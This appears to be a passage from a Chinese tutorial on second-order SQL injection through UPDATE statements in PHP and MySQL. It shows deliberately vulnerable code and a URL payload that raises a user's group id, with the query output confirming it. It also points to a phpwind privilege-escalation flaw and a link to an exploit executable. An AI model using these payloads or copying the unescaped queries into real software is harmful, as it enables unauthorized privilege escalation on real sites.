UPDATE注射(mysql+php)的两个模式

$sql= "select pass from userinfo where user=''heige''";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass=''$userinfo[0]'' where user=''heige''";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update中国网管联盟bitsCN.com

?>

我们测试下，提交：网管bitscn_com

http://127.0.0.1/test3.php?p=123456'',groudid=''1

回mysql查询下 ：网管论坛bbs_bitsCN_com

mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了，简单的描叙如下：

update --> select --> update

四、实际模式

模式1：缺

模式2：phpwind 2.0.2和3.31e 权限提升漏洞

漏洞分析

update （profile.php 注射变量为$proicon update语句里为,icon=''$userdb[icon]''）
↓
select （jop.php）
↓
updtate （jop.php）网管论坛bbs_bitsCN_com

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五、鸣谢

特别感谢saiy等朋友的讨论和帮助。Thanks!!

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!